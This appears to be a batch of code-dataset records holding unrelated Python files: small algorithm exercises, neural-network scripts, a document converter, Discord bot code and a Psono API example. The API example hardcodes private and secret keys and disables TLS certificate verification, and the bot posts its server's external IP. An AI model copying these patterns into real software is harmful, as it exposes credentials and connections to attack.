time_to_location_in_hours\r\ndays_to_the_moon = (238900 / mph_to_location) / 24\r\ndays_to_mars = (33900000 / mph_to_location) / 24\r\n\r\nprint('%s is %s miles from your home' % (chosen_location, distance_to_location_in_miles))\r\nprint('')\r\nprint('it takes you %s hours to get there' %time_to_location_in_hours)\r\nprint('')\r\nprint('you travel to %s at an average speed of %s mph' %(chosen_location, mph_to_location))\r\nprint('')\r\nprint('it would take you %s days to travel to the moon at that speed,' % days_to_the_moon)\r\nprint('and %s days to get to mars!' % days_to_mars)\r\n\r\n","sub_path":"unit1.py","file_name":"unit1.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"538846978","text":"# Algorithm for finding people with the same name\n\n# Find names that appear two or more times\n# Input: a list containing n names\n# Output: the set of names repeated among the n names\n\ndef find_same_name(a):\n n = len(a) # store the number of items in the list in n\n result = set() # empty set to store the result\n for i in range(0, n-1): # iterate from 0 to n-2; a[n-1] has already been compared earlier\n for j in range(i + 1, n):\n if a[i] == a[j]:\n result.add(a[i])\n return result\n\nname = [\"Tom\", \"Jerry\", \"Mike\", \"Tom\"]\nprint(find_same_name(name))\nname2 = [\"Tom\", \"Jerry\", \"Mike\", \"Tom\", \"Mike\"]\nprint(find_same_name(name2))\n\n# Algorithm analysis\n# name 0 is compared n-1 times ... name n-1 is compared 0 times\n# the total count is the sum from 0 to n-1 => the sum from 1 to n\n# n(n-1)/2 -> O(n^2) in big-O notation\n","sub_path":"1_기초/samename.py","file_name":"samename.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"7352984","text":"import numpy as np\ndef my_sigmoid(x, deriv = False):\n\tif(deriv==True):\n\t\treturn x*(1-x)\n\treturn 1/(1+np.exp(-x))\nnp.random.seed(1)\n\n# x has two fields: whether it is a workday, and whether it is rainy\n# y has two fields: the number of bikes borrowed and the number returned\nx = np.array([[1,0],[1,0],[1,0],[1,1],[1,0],[0,0],[0,1]])\ny = np.array([[27,31],[28,27],[28,30],[12,11],[30,26],[18,13],[8,7]])\ntest = np.array([[1,0],[1,0],[1,0],[1,1],[1,0],[0,0],[0,1]])\nsyn0 = 2*np.random.random((2,4))-1\nsyn1 = 2*np.random.random((4,3))-1\nsyn2 = 2*np.random.random((3,2))-1\nrate = 0.1\nfor j in range(1000):\n L0 = x\n L1 = my_sigmoid(np.dot(L0,syn0))\n L2 = my_sigmoid(np.dot(L1,syn1))\n L3 = np.dot(L2,syn2)\n L3_error = y - L3 \n L3_delta = L3_error\n L2_error = L3_delta.dot(syn2.T)\n L2_delta = L2_error*my_sigmoid(L2,deriv = True)\n L1_error = L2_delta.dot(syn1.T)\n L1_delta = L1_error*my_sigmoid(L1,deriv = True)\n if(j%100 == 0):\n rate = rate / 2\n syn2 += rate*np.dot(L2.T,L3_delta)\n syn1 += rate*np.dot(L1.T,L2_delta)\n syn0 += rate*np.dot(L0.T,L1_delta)\n\nMy_result_1 = my_sigmoid(np.dot(test,syn0))\nMy_result_2 = my_sigmoid(np.dot(My_result_1,syn1))\nMy_result = np.dot(My_result_2,syn2)\n\nprint(My_result)\n","sub_path":"Mathematical_Modeling/code/BP/BP.py","file_name":"BP.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"48929547","text":"from discord import Colour\n\n# all factions recognised by BB\nfactions = [\"terran\", \"vossk\", \"midorian\", \"nivelian\", \"neutral\"]\n# all factions useable in bounties\nbountyFactions = [\"terran\", \"vossk\", \"midorian\", \"nivelian\"]\n\n# levels of security in SolarSystems (SolarSystem security is stored as an index in this list)\nsecurityLevels = [\"secure\", \"average\", \"risky\", \"dangerous\"]\n\n# map image URLS for cmd_map\nmapImageWithGraphLink = 
\"https://cdn.discordapp.com/attachments/700683544103747594/700683693215318076/gof2_coords.png\"\nmapImageNoGraphLink = 'https://i.imgur.com/TmPgPd3.png'\n\n# icons for factions\nfactionIcons = {\"terran\": \"https://cdn.discordapp.com/attachments/700683544103747594/711013574331596850/terran.png\",\n \"vossk\": \"https://cdn.discordapp.com/attachments/700683544103747594/711013681621893130/vossk.png\",\n \"midorian\": \"https://cdn.discordapp.com/attachments/700683544103747594/711013601019691038/midorian.png\",\n \"nivelian\": \"https://cdn.discordapp.com/attachments/700683544103747594/711013623257890857/nivelian.png\",\n \"neutral\":\n \"https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/rocket_1f680.png\",\n \"void\": \"https://cdn.discordapp.com/attachments/700683544103747594/711013699841687602/void.png\"}\n\nerrorIcon = \"https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/exclamation-mark_2757.png\"\nwinIcon = \"https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/trophy_1f3c6.png\"\nrocketIcon = \"https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/rocket_1f680.png\"\n\n# colours to use in faction-related embed strips\nfactionColours = { \"terran\": Colour.gold(),\n \"vossk\": Colour.dark_green(),\n \"midorian\": Colour.dark_red(),\n \"nivelian\": Colour.dark_blue(),\n \"neutral\": Colour.purple()}\n\n# Data representing all ship items in the game. These are used to create bbShip objects,\n# which are stored in builtInShipObjs in a similar dict format.\n# Ships to not have tech levels in GOF2, so tech levels will be automaticaly generated\n# for the sake of the bot during bot.on_ready.\nbuiltInShipData = {}\n\n# Data representing all module items in the game. These are used to create bbModule objects,\n# which are stored in builtInModuleObjs in a similar dict format.\nbuiltInModuleData = {}\n\n# Data representing all primary weapon items in the game. These are used to create bbWeapon objects,\n# which are stored in builtInWeaponObjs in a similar dict format.\nbuiltInWeaponData = {}\n\n# Data representing all ship upgrades in the game. 
These are used to create bbShipUpgrade objects,\n# which are stored in builtInUpgradeObjs in a similar dict format.\nbuiltInUpgradeData = {}\n\n# data for builtIn criminals to be used in Criminal.fromDict\n# criminals marked as not builtIn to allow for dictionary init.\n# The criminal object is then marked as builtIn during bot.on_ready\nbuiltInCriminalData = {}\n\n# data for builtIn systems to be used in SolarSystem.fromDict\nbuiltInSystemData = {}\n\n# data for builtIn Turrets to be used in bbTurret.fromDict\nbuiltInTurretData = {}\n\n# data for builtIn commodities to be used in bbCommodity.fromDict (unimplemented)\nbuiltInCommodityData = {}\n\nbuiltInToolData = {}\n\n# data for builtIn secondaries to be used in bbSecondary.fromDict (unimplemented)\nbuiltInSecondariesData = {}\n\n# data for builtIn ShipSkins to be used in ShipSkin.fromDict\nbuiltInShipSkinsData = {}\n\n\n# Objects representing all ship skins in the game.\nbuiltInShipSkins = {}\nbuiltInToolObjs = {}\n# To be populated during bot.on_ready\n# These dicts contain item name: item object for the object described in the variable name.\n# This is primarily for use in their relevant fromDict functions.\nbuiltInSystemObjs = {}\nbuiltInCriminalObjs = {}\nbuiltInModuleObjs = {}\nbuiltInWeaponObjs = {}\nbuiltInUpgradeObjs = {}\nbuiltInTurretObjs = {}\n\n# References to the above item objects, sorted by techLevel.\nshipKeysByTL = []\nmoduleObjsByTL = []\nweaponObjsByTL = []\nturretObjsByTL = []\n\n\n# names of criminals in builtIn bounties\nbountyNames = {}\n# the length of the longest criminal name, to be used in padding during cmd_bounties\nlongestBountyNameLength = 0\n","sub_path":"bot/cfg/bbData.py","file_name":"bbData.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"229777272","text":"import requests\nimport json\nimport nacl.encoding\nimport nacl.signing\nimport nacl.secret\n\napi_key_id = '747b0fb0-1f25-4c45-af94-50d487af15f1'\napi_key_private_key = 'e6e71d12eaade92994a915fa5ecfd54223e53d72e02cfc73bc2b968a061eea7e'\napi_key_secret_key = '1a74783f7429b95b64483f910019d3559f7f1da429fcc1a2e187880e938d611c'\nserver_url = 'https://browserplugins.chickahoona.com/server'\nserver_public_key = '02da2ad857321d701d754a7e60d0a147cdbc400ff4465e1f57bc2d9fbfeddf0b'\nserver_signature = '4ce9e761e1d458fe18af577c50eb8249a0de535c9bd6b7a97885c331b46dcbd1'\n\n\nSSL_VERIFY = False\n\n\ndef api_request(method, endpoint, data = None):\n\n headers = {'content-type': 'application/json'}\n\n r = requests.request(method, server_url + endpoint, data=data, headers=headers, verify=SSL_VERIFY)\n\n return r.json()\n\ndef api_read_secret(secret_id):\n\n method = 'POST'\n endpoint = '/api-key-access/secret/'\n\n data = json.dumps({\n 'api_key_id': api_key_id,\n 'secret_id': secret_id,\n })\n\n encrypted_secret = api_request(method, endpoint, data)\n\n # decrypt step 1: Decryption of the encryption key\n crypto_box = nacl.secret.SecretBox(api_key_secret_key, encoder=nacl.encoding.HexEncoder)\n encryption_key = crypto_box.decrypt(nacl.encoding.HexEncoder.decode(encrypted_secret['secret_key']),\n nacl.encoding.HexEncoder.decode(encrypted_secret['secret_key_nonce']))\n\n # decrypt step 2: Decryption of the secret\n crypto_box = nacl.secret.SecretBox(encryption_key, encoder=nacl.encoding.HexEncoder)\n decrypted_secret = crypto_box.decrypt(nacl.encoding.HexEncoder.decode(encrypted_secret['data']),\n nacl.encoding.HexEncoder.decode(encrypted_secret['data_nonce']))\n\n 
return json.loads(decrypted_secret)\n\ndef main():\n\n secret_id = 'c81d0cff-65f9-4f81-9815-dbe2850331c9'\n\n decrypted_secret = api_read_secret(secret_id)\n\n print(decrypted_secret)\n\n\nif __name__ == '__main__':\n main()","sub_path":"examples/api_key_without_session.py","file_name":"api_key_without_session.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"496876362","text":"'''\nimport PyPDF2 as pyPdf\n\nfilename = \"intro_to_envi.pdf\";\npdf = pyPdf.PdfFileReader(open(filename, \"rb\"))\ni = -1;\nfor page in pdf.pages:\n i = i + 1;\n print(\"---Page \", i, \":--------------------------------\");\n print (page.extractText())\n \n input(\"Press Enter to continue...\")\n \n'''\n\nimport textract\nimport shutil\nimport os\n\n######################\n## Find all docs\n#########################\nsource_root = \"inputs\";\ndone_root = \"done\";\noutput_root = \"inputs\";\ndoc_list = [];\ni = -1;\nfor afile in os.listdir(source_root):\n if afile.endswith(\".pdf\") or afile.endswith(\".epub\"):\n i = i+1;\n doc_list.append(afile);\n #print(file)\n#print (doc_list);\n#exit();\n\n\ndef convert_doc_to_txt(path):\n text = textract.process(path);\n return text\n\ndef move_doc_to_done(source_path, done_path):\n result = shutil.move(source_path, done_path);\n return result;\n \n######################\n## Convert all docs\n#########################\nprint(\"\\n\");\nprint(\"Converting all docs...\");\nfor file_name in doc_list:\n #file_name = \"lonely_planet.pdf\";\n source_path = source_root + \"/\" + file_name;\n done_path = done_root + \"/\" + file_name;\n print (\" -- Converting \" + source_path);\n text = convert_doc_to_txt(source_path);\n #print(text);\n\n f = open(output_root+\"/\"+file_name[0:-4]+'.text', 'w+')\n f.write(text); # python will convert \\n to os.linesep\n f.close() # you can omit in most cases as the destructor will call it\n\n #print (\" -- Moving it to \" + done_path);\n #move_doc_to_done(source_path, done_path);\n\n","sub_path":"feature_engineering/preprocess_input/sense2vec/doc_to_txt.py","file_name":"doc_to_txt.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"379122118","text":"import tensorflow as tf\nimport numpy as np\nimport NNutils\nimport mnist\nfrom datetime import datetime\nimport flags\nclass Network():\n def __init__(self, layers = [400, 200, 100], regul=False, bn=False, droprate=.0):\n self.batch_size = 128\n self.learning_rate = 0.001\n self.global_step = tf.Variable(0, trainable=False)\n\n self.x = tf.placeholder(\"float32\", [None, 28 * 28 * 1])\n self.y = tf.placeholder(\"float32\", [None, 10])\n\n self.droprate_train = droprate\n self.droprate_test = 0.0\n self.droprate_ph = tf.placeholder(\"float\")\n\n self.layers = layers\n self.train_list = []\n\n self.activation = \"relu\"\n self.network = \"mlp\"\n\n # regularization-related variables\n if regul == True:\n self.regularize = 0.001\n self.regularizer = tf.contrib.layers.l2_regularizer(self.regularize)\n self.network += \"_regul\"\n else:\n self.regularizer = None\n\n if bn == True:\n self.batch_normalization = True\n self.network += \"_bn\"\n else:\n self.batch_normalization = False\n\n def fc_layer(self, x, output_num, activation, dropout):\n if activation == 'relu':\n activation = tf.nn.relu\n elif activation == 'sigmoid':\n activation = tf.nn.sigmoid\n elif activation == 'tanh':\n activation = 
tf.nn.tanh\n else:\n activation = None\n\n output = tf.layers.dense(x, output_num, activation=activation,\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=self.regularizer)\n output = tf.nn.dropout(output, 1 - dropout)\n\n y = output\n return y\n\n def info(self):\n layers_sum = str(sum(self.layers))\n layers_num = str(len(self.layers))\n dropout = str(self.droprate_train)\n return self.network + \"-\" + self.activation + \"-\" + layers_num + \"-\" + layers_sum + \"-d\" + dropout\n\n def model(self, x): #[3072, 450, 300, 200, 100, 50, 10]\n layers = self.layers\n image_size = 32\n output = x\n reshape_size = 0\n\n layer_num = 0\n\n for layer in layers:\n layer_num += 1\n with tf.variable_scope('fc' + str(layer_num)):\n if self.batch_normalization == True:\n output = tf.layers.batch_normalization(output)\n # output = fc_layer('fc', output, layer, activation=self.activation, dropout=self.dropout_normal)\n output = self.fc_layer(output, layer, activation=self.activation, dropout=self.droprate_ph)\n with tf.variable_scope('fc'):\n output = tf.contrib.layers.fully_connected(output, 10, activation_fn=None)\n\n y = output\n return y\n\n def train(self):\n\n #learning rate\n with tf.name_scope(\"learning_rate\"):\n learning_rate = tf.train.exponential_decay(0.001,\n self.global_step,\n (50000 / self.batch_size) * 10,\n 0.95, staircase=True)\n learning_rate = tf.maximum(0.0001, learning_rate)\n tf.summary.scalar(\"learning_rate\", learning_rate)\n\n #model\n y_ = self.model(self.x)\n\n #cost and training\n with tf.name_scope(\"cost\"):\n self.loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_, labels=self.y))\n\n # add the regularization term\n if self.regularizer != None:\n reg_variables = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n reg_term = tf.contrib.layers.apply_regularization(self.regularizer, reg_variables)\n self.loss += reg_term\n\n self.training = tf.train.AdamOptimizer(learning_rate=learning_rate). 
\\\n minimize(self.loss, global_step=self.global_step)\n\n tf.summary.scalar(\"loss\", self.loss)\n\n with tf.name_scope(\"accuracy\"):\n compare = tf.equal(tf.argmax(self.y, 1), tf.argmax(y_, 1))\n self.accuracy = tf.reduce_mean(tf.cast(compare, \"float\"))\n\n tf.summary.scalar(\"accuracy\", self.accuracy)\n\n def run(self, step_limit):\n self.train()\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n\n dataset = mnist.read_data_sets(flags.MNIST_DIR, one_hot=True)\n train_data, train_label, test_data, test_label = dataset.train.images, dataset.train.labels, \\\n dataset.test.images, dataset.test.labels\n\n test_indices = np.arange(len(test_data))\n np.random.shuffle(test_indices)\n test_indices = test_indices[0:1000]\n name = self.info()\n path = \"mnist/\" + str(step_limit) + name\n saver = NNutils.save(path, sess)\n writer, writer_test, merged = NNutils.graph(path, sess)\n\n step = sess.run(self.global_step)\n while step < step_limit:\n print(\"step :\", step)\n for start, end in zip(range(0, len(train_data), self.batch_size),\n range(self.batch_size, len(train_data), self.batch_size)):\n summary, \\\n _, loss, \\\n step = sess.run([merged,\n self.training, self.loss,\n self.global_step],\n feed_dict={self.x: train_data[start:end],\n self.y: train_label[start:end],\n self.droprate_ph: self.droprate_train})\n\n if step % 50 == 0:\n writer.add_summary(summary, step)\n print(step, datetime.now(), loss)\n\n summary, \\\n loss, \\\n accuracy = sess.run([merged, self.loss, self.accuracy],\n feed_dict={self.x: test_data,\n self.y: test_label,\n self.droprate_ph: self.droprate_test})\n\n writer_test.add_summary(summary, step)\n print(\"test results : \", accuracy, loss)\n saver.save(sess, path + \"/\" + name + \".ckpt\", step)\n\nif __name__ == \"__main__\":\n model = Network(regul=False, bn=False, droprate=0.5)\n model.run(100000)","sub_path":"ANN/RW/mnist_mlp.py","file_name":"mnist_mlp.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"499951129","text":"import discord, sys, asyncio, re, random, os, time, platform, socket, psutil, cpuinfo\nfrom discord.ext import commands\nfrom requests import get\nfrom discord.ext.commands import Bot\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nbot = commands.Bot(command_prefix='!')\nbot.remove_command(\"help\")\n\ndef reload_bot():\n python = sys.executable\n os.execl(python, python, * sys.argv)\n\ndef command_logs(cmd_str, author, message):\n print (bcolors.WARNING + (time.strftime(\"%d/%m/%Y %H:%M:%S\")) + \n bcolors.ENDC, \":\", bcolors.WARNING + (\"{}\").format(author.name) + \n bcolors.ENDC, \"a éxécuté la commande\", bcolors.WARNING + (cmd_str)\n + bcolors.ENDC, \"avec succès sur le serveur : \", bcolors.WARNING + \n message.server.name + bcolors.ENDC)\n\ndef command_logs_critics(cmd_str, author, message):\n print (bcolors.WARNING + (time.strftime(\"%d/%m/%Y %H:%M:%S\")) + \n bcolors.ENDC, \":\", bcolors.WARNING + (\"{}\").format(author.name) + bcolors.ENDC, \n bcolors.FAIL + \"a éxécuté la commande\" + bcolors.ENDC, bcolors.WARNING + (cmd_str) + \n bcolors.ENDC, bcolors.FAIL + \"sans y être autorisé.\" + bcolors.ENDC, \"sur le serveur : \", \n bcolors.WARNING + message.server.name + bcolors.ENDC)\n\n\n@bot.event\nasync def on_ready():\n print (bcolors.OKGREEN + 
(time.strftime(\"%d/%m/%Y %H:%M:%S :\")), \n (\"Connexion de {} avec l'id {}\").format(bot.user.name, bot.user.id) + bcolors.ENDC)\n \n em = discord.Embed(title='Le bot a redémarré', \n description=(\"Nous nous éfforçons de continuellement améliorer le bot,\\n\"\n \"ce redémarrage est pour nous le seul moyen pour mettre a jour Franky.\\n\"\n \"Nous sommes désolés pour les désagréments.\"), colour=0x43b581)\n\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(bot.get_channel('310127519753830400'), embed=em)\n await bot.change_presence(game=discord.Game(name=\"rien\"))\n await bot.change_presence(game=discord.Game(name=\"!help | BETA v1.0\"))\n\n@bot.event\nasync def on_member_join(member):\n server = member.server\n server_name = server.name\n em = discord.Embed(title='Bienvenue sur le serveur, ' + member.name, \n description=\"**!help** pour avoir de l'aide !\", colour=0x3498db)\n\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(server.default_channel, embed=em)\n \n print (bcolors.WARNING + (time.strftime(\"%d/%m/%Y %H:%M:%S\")) + bcolors.ENDC, \":\", \n bcolors.WARNING + (\"{}\").format(member.name) + \n bcolors.ENDC, \"s'est connecté avec succès sur le serveur : \", \n bcolors.WARNING + server_name + bcolors.ENDC)\n\n@bot.event\nasync def on_member_remove(member):\n server = member.server\n server_name = server.name\n em = discord.Embed(title=member.name + ' a quitté le serveur..', colour=0xe74c3c)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(server.default_channel, embed=em)\n \n print (bcolors.WARNING + (time.strftime(\"%d/%m/%Y %H:%M:%S\")) + bcolors.ENDC, \":\", \n bcolors.WARNING + (\"{}\").format(member.name) + \n bcolors.ENDC, \"a quitté le serveur\", bcolors.WARNING + (\":(\") + \n bcolors.ENDC, \"avec succès sur le serveur : \", \n bcolors.WARNING + server_name + bcolors.ENDC)\n\n@bot.event\nasync def on_server_join(server):\n member = server.me\n server_name = server.name\n em = discord.Embed(title='Bonjour, je suis Franky !', \n description=(\"N'oubliez pas de me donner un rôle ayant les droits d'administration,\"\n \" ou je ne pourrai rien faire pour vous aider..\"), colour=0x43b581)\n await bot.send_message(server.default_channel, embed=em)\n\n@bot.event\nasync def on_command_error(error, ctx):\n cmd_str = \"inconnue\"\n message = ctx.message\n channel = ctx.message.channel\n member = ctx.message.author\n author = member\n if isinstance(error, commands.CommandNotFound):\n em = discord.Embed(title=member.name + ', je ne connais pas cette commande.. 
', colour=0xe74c3c)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(channel, embed=em)\n print (bcolors.WARNING + (time.strftime(\"%d/%m/%Y %H:%M:%S\")) + \n bcolors.ENDC, \":\", bcolors.WARNING + (\"{}\").format(author.name) + \n bcolors.ENDC, \"a éxécuté une commande\", bcolors.WARNING + (cmd_str)\n + bcolors.ENDC, \"sur le serveur : \", bcolors.WARNING + \n message.server.name + bcolors.ENDC)\n\n@bot.command(pass_context=True)\nasync def botsysteminfo(ctx):\n cmd_str = \"!botsysteminfo\"\n message = ctx.message\n await bot.send_typing(message.channel)\n author = message.author\n extIP = get('https://ipapi.co/ip/').text\n networkAdress = socket.gethostbyname(socket.gethostname())\n currentUsageCPU = psutil.cpu_percent()\n pid = os.getpid()\n py = psutil.Process(pid)\n currentRamUsage = py.memory_info()[0]/2.**30\n os_uname = os.uname()\n info = cpuinfo.get_cpu_info()\n info_cpu = info['brand']\n from psutil import virtual_memory\n mem = virtual_memory()\n mem_total = mem.total\n mem_total = mem_total / 1000000000\n st = psutil.disk_usage('/')\n st = st.total / 1000000000\n disk_used = psutil.disk_usage('/')\n disk_used = disk_used.used / 1000000000\n \n em = discord.Embed(title='Informations sur le serveur du bot :', \n description=(\"**Configuration matérielle du serveur :**\\n\"\n \"Processeur : **{}**\\n\"\n \"Mémoire RAM : **{}**Gb\\n\"\n \"Capacité totale du disque : **{}**Gb\\n\"\n \"Le serveur du bot est hébergé par **Amazon USA Ouest (Oregon)**\\n\\n\"\n \"**Utilisation actuelle du serveur :**\\n\"\n \"L'utilisation actuelle du processeur est de **{}**%\\n\"\n \"L'utilisation actuelle de la RAM est de **{}**Gb\\nL'utilisation du disque et de : **{}**Gb\\n\"\n \"L'adresse IP du serveur du bot est **{}**\").format(info_cpu, round(mem_total, 2), round(st, 2), currentUsageCPU, \n round(currentRamUsage, 3), round(disk_used, 2), extIP), colour=0x3498db)\n\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n command_logs(cmd_str, author, message)\n\n@bot.command(pass_context=True)\nasync def help(ctx):\n cmd_str = \"!help\"\n message = ctx.message\n author = message.author\n \n em = discord.Embed(title='Liste des commandes :', \n description=(\"**!messages_count** : Savoir combien de messages vous avez sur le channel \\n\"\n \"**!clear** : Nettoie le channel **(doit être éxécutée par un admin)** \\n\"\n \"**!askfranky** : Vous répond Oui, Non ou Peut-être de manière aléatoire \\n\"\n \"**!botsysteminfo** : Donne des informations sur le système du bot\\n\"\n \"**!gitbot** : Envoi un lien vers le répertoire GitHub du bot\\n\"\n \"**!admincall** : Appelles un admin **(a utiliser uniquement en cas de besoin réel !)**\\n\"\n \"**!ping** : Vous donne le temps de latence entre le serveur du bot et Google France\\n\"\n \"**!frankyonmyserver** : Vous permet d'ajouter Franky sur votre serveur !\"), colour=0x3498db)\n \n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n command_logs(cmd_str, author, message)\n\n@bot.command(pass_context=True)\nasync def messages_count(ctx):\n cmd_str = \"message_count\"\n message = ctx.message\n author = message.author\n server = author.server\n counter = 0\n async for log in bot.logs_from(message.channel, limit=100):\n if log.author == message.author:\n counter += 1\n counter = str(counter)\n em = discord.Embed(title=author.name + ' vous avez écrit ' + counter + ' messages dans ce salon.', colour=0x3498db)\n em.set_footer(text=time.strftime(\"Le 
%d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n command_logs(cmd_str, author, message)\n\n@bot.command(pass_context=True)\nasync def messages_count(ctx):\n cmd_str = \"!messages_count\"\n message = ctx.message\n author = message.author\n server = author.server\n counter = 0\n async for log in bot.logs_from(message.channel, limit=100):\n if log.author == message.author:\n counter += 1\n counter = str(counter)\n em = discord.Embed(title=author.name + ' vous avez écrit ' + counter + ' messages dans ce salon.', colour=0x3498db)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(server, embed=em)\n command_logs(cmd_str, author, message)\n\n@bot.command(pass_context=True)\nasync def reload(ctx):\n cmd_str = \"!reload\"\n message = ctx.message\n author = message.author\n if author.id == '213683309530710016':\n if author.server_permissions.administrator == True:\n command_logs(cmd_str, author, message)\n reload_bot()\n else:\n \n em = discord.Embed(title=\"Vous n'êtes pas autorisé a faire cela !\", \n description=\"Seuls les administrateurs peuvent lancer cette commande.\", colour=0xe74c3c)\n\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n command_logs_critics(cmd_str, author, message)\n \n em2 = discord.Embed(title=message.author.name + \" a tenté d'éxécuter la commande **!reload** dans #\" + \n message.channel.name, colour=0xf39c12)\n\n em2.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(discord.Object(\"313829118011506690\"), embed=em2)\n else:\n \n em = discord.Embed(title=\"Vous n'êtes pas autorisé a faire cela !\", \n description=\"Seul le créateur du bot peut lancer cette commande.\", colour=0xe74c3c)\n\n em3 = discord.Embed(title=message.author.name + \" a tenté d'éxécuter la commande **!reload** dans #\" + \n message.channel.name + \" sur le serveur : \" + message.server.name, colour=0xf39c12)\n\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n await bot.send_message(discord.Object(\"313829118011506690\"), embed=em3)\n\n@bot.command(pass_context=True)\nasync def clear(ctx):\n cmd_str = \"!clear\"\n message = ctx.message\n author = message.author\n server = author.server\n channel = discord.utils.get(server.channels, name='administration_bot')\n channel_str = str(channel)\n if channel_str == \"administration_bot\":\n channel_id = channel.id\n if author.server_permissions.administrator == True:\n counter = 0\n tmp = await bot.say('Nettoyage des messages...')\n await asyncio.sleep(5)\n async for msg in bot.logs_from(message.channel):\n counter += 1\n await bot.delete_message(msg) \n \n em = discord.Embed(title='Nettoyage terminé', \n description=(\"{} messages ont été supprimés dans ce salon.\".format(counter)), colour=0x43b581)\n\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n command_logs(cmd_str, author, message)\n\n else:\n \n em2 = discord.Embed(title=\"Vous n'êtes pas autorisé a faire cela !\", \n description=\"Seuls les administrateurs peuvent lancer cette commande.\", colour=0xe74c3c)\n\n command_logs_critics(cmd_str, author, message)\n\n em2.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em2)\n \n em3 = discord.Embed(title=message.author.name + \" a tenté d'éxécuter la commande **!clear** dans #\" + \n message.channel.name, colour=0xf39c12)\n\n em3.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(discord.Object(channel_id), embed=em3)\n else:\n em2 = discord.Embed(title=\"Vous n'êtes pas autorisé a faire cela !\", \n description=\"Seuls les administrateurs peuvent lancer cette commande.\", colour=0xe74c3c)\n\n command_logs_critics(cmd_str, author, message)\n\n em2.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em2)\n \n em2 = discord.Embed(title=\"Salon d'administration non trouvé..\", \n description=(\"Le bot a besoin d'un salon **administration_bot** pour fonctionner correctement..\\n\"\n \"Si vous en avez déjà créé un, vérifier 
que vous l'avez bien orthographié. \"), colour=0xe74c3c)\n em2.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em2)\n\n@bot.command(pass_context=True)\nasync def askfranky(ctx):\n cmd_str = \"!askfranky\"\n message = ctx.message\n author = message.author\n server = author.server\n await bot.send_typing(message.channel)\n await asyncio.sleep(5)\n options = [\"Oui\",\"Non\",\"Peut-être\"]\n option = random.choice(options)\n em = discord.Embed(title=option, colour=0x3498db)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(server, embed=em)\n command_logs(cmd_str, author, message)\n\n@bot.command(pass_context=True)\nasync def gitbot(ctx):\n cmd_str = \"!gitbot\"\n message = ctx.message\n author = message.author\n server = author.server\n \n em = discord.Embed(title=\"Voici le répertoire GitHub du bot, n'oubliez pas de donner crédits si vous en faite usage..\", \n description='[Répertoire GitHub : SrOw_bot par SrOw](https://github.com/VinCySrOw/SrOw_bot)', colour=0x3498db)\n\n em.set_author(name='GitHub', icon_url=\"https://github.com/fluidicon.png\")\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n command_logs(cmd_str, author, message)\n\n@bot.command(pass_context=True)\nasync def admincall(ctx):\n message = ctx.message\n author = message.author\n server = author.server\n channel = discord.utils.get(server.channels, name='administration_bot')\n channel_str = str(channel)\n if channel_str == \"administration_bot\":\n channel_id = channel.id\n cmd_str = \"!admincall\"\n em = discord.Embed(title=\"Un administrateur a été appelé.\", colour=0x43b581)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n em3 = discord.Embed(title=message.author.name + \" a appelé un admin dans #\" + message.channel.name, colour=0x43b581)\n 